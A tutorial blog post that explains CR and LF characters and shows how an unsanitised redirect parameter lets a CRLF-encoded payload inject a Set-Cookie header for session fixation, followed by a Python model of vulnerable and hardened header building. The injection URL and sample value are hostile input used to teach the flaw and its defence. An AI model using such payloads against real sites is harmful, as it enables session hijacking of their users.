CRLF Injection and HTTP Header Injection Attack Explained With Example

Today we are gonna talk about CRLF injection and HTTP Header Injection.

Carriage Return, New Line and Line Feed Characters

Whenever you hit enter in your text editor or somewhere else, your cursor goes to the next line, right? But how does the line break remain intact when you copy the text somewhere else? How do programs find out where the end of a line is?

Well, there are some characters which mysteriously handle this sort of stuff. Let's take a look at them:

  1. Carriage Return (CR): A carriage return brings the cursor to the beginning of the line. It doesn’t take you to the next line. It is commonly represented as \r, 0x0D or %0d.
  2. Line Feed (LF): A line feed brings the cursor to the next line. It is commonly represented as \n, 0x0A or %0a.
  3. End Of Line (EOL): This is a combination of CR and LF. It brings the cursor to the next line and to the beginning of that line. It is represented as \r\n or %0d%0a.

Why do we have three of these? Here’s why:

  • CR LF works on DOS/Windows
  • CR on older Macs
  • LF on Unix and modern Macs

CRLF Injection

Good question! Let's say we have a web app which doesn’t sanitize user input and passes the characters discussed above straight through into its output; this causes a vulnerability called CRLF injection.
A CRLF injection vulnerability can lead to HTTP response splitting, session fixation, web cache poisoning or cross-user defacement.

HTTP Header Injection

It's an attack which exploits a CRLF injection vulnerability to let an attacker inject custom headers into the response. Let me show you how it's done.

Let's say we are browsing a website, example.com. We are looking at pictures and clicking links, and suddenly we reach a page whose URL is example.com/redirect.php?origin=something; after a few seconds we get redirected to another page. Hmm, let's take a look at the response headers:

HTTP/1.1 200 OK
Date: Sat, 21 Oct 2017 11:01:32 GMT
Origin: something
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Server: cloudflare-nginx
CF-RAY: A34nob9d248a85-BMO

Wait a second, there’s an Origin header with the value something. We saw that somewhere, right? The URL of the previous page was example.com/redirect.php?origin=something, and now the value of the origin parameter is part of the response headers.

So the web app is including the value of the origin parameter in its response headers. You know what? I want to inject my own custom header, Set-Cookie: SessionID=hacked. Let's do this by putting it in the origin parameter:
example.com/redirect.php?origin=Set-Cookie: SessionID=hacked
And here are the response headers:

HTTP/1.1 200 OK
Date: Sat, 21 Oct 2017 11:01:32 GMT
Origin: Set-Cookie: SessionID=hacked
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Server: cloudflare-nginx
CF-RAY: A34nob9d248a85-BMO

Oops! We missed the target. Our header should be on the next line. Any guesses how to do that? CRLF injection!
example.com/redirect.php?origin=done%0d%0aSet-Cookie: SessionID=hacked
Annnnd boom!

HTTP/1.1 200 OK
Date: Sat, 21 Oct 2017 11:01:32 GMT
Origin: done
Set-Cookie: SessionID=hacked
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Server: cloudflare-nginx
CF-RAY: A34nob9d248a85-BMO

As you saw, I am able to add custom headers to the response by injecting CRLF characters, and this is what we call HTTP Header Injection.
What's so special about the ability to add custom headers?
As you saw in this example, we injected a Set-Cookie header, which is used to supply cookies from the server to the client. So basically, if a victim clicks our link, the cookie SessionID=hacked will be stored in their browser, and this is what we call a session fixation attack.
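A small Python model of what happened above, added here as an example and not code from the original post: a naive header builder that behaves like the redirect.php page, the same builder with the CR/LF check that modern servers and frameworks apply to header values, and a parser that shows which headers a browser would actually see. The function names and the three-line response are my own simplification.

```python
from typing import Optional
from urllib.parse import unquote

# Constructed sample values: the origin parameter from the post, benign and
# CRLF-carrying, as the server sees them after URL decoding.
BENIGN_ORIGIN = "something"
MALICIOUS_ORIGIN = unquote("done%0d%0aSet-Cookie: SessionID=hacked")

def build_headers_vulnerable(origin: str) -> str:
    """Models the vulnerable redirect.php: the origin parameter is
    concatenated into a header line with no check for CR or LF."""
    lines = [
        "HTTP/1.1 200 OK",
        "Origin: " + origin,  # user-controlled and unchecked
        "Content-Type: text/html; charset=UTF-8",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"

def build_headers_hardened(origin: str) -> str:
    """Same response, but a value containing CR or LF is refused, which is
    the check modern servers and frameworks apply to header values."""
    if "\r" in origin or "\n" in origin:
        raise ValueError("CR/LF not allowed in a header value")
    return build_headers_vulnerable(origin)

def hardened_accepts(origin: str) -> bool:
    """True if the hardened builder lets this origin value through."""
    try:
        build_headers_hardened(origin)
    except ValueError:
        return False
    return True

def parse_headers(raw: str) -> dict:
    """Splits a raw header block on CRLF into a name -> value dict,
    roughly the way a browser reads the response headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    _status, *fields = head.split("\r\n")
    headers = {}
    for field in fields:
        name, _, value = field.partition(":")
        headers[name.strip()] = value.strip()
    return headers

def injected_cookie(origin: str) -> Optional[str]:
    """Set-Cookie value a client sees from the vulnerable app for this
    origin parameter, or None when no extra header got in."""
    return parse_headers(build_headers_vulnerable(origin)).get("Set-Cookie")
```

Running `injected_cookie(MALICIOUS_ORIGIN)` returns the smuggled cookie value, while `hardened_accepts(MALICIOUS_ORIGIN)` is False because the CR/LF check refuses the value before it ever reaches a header line.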
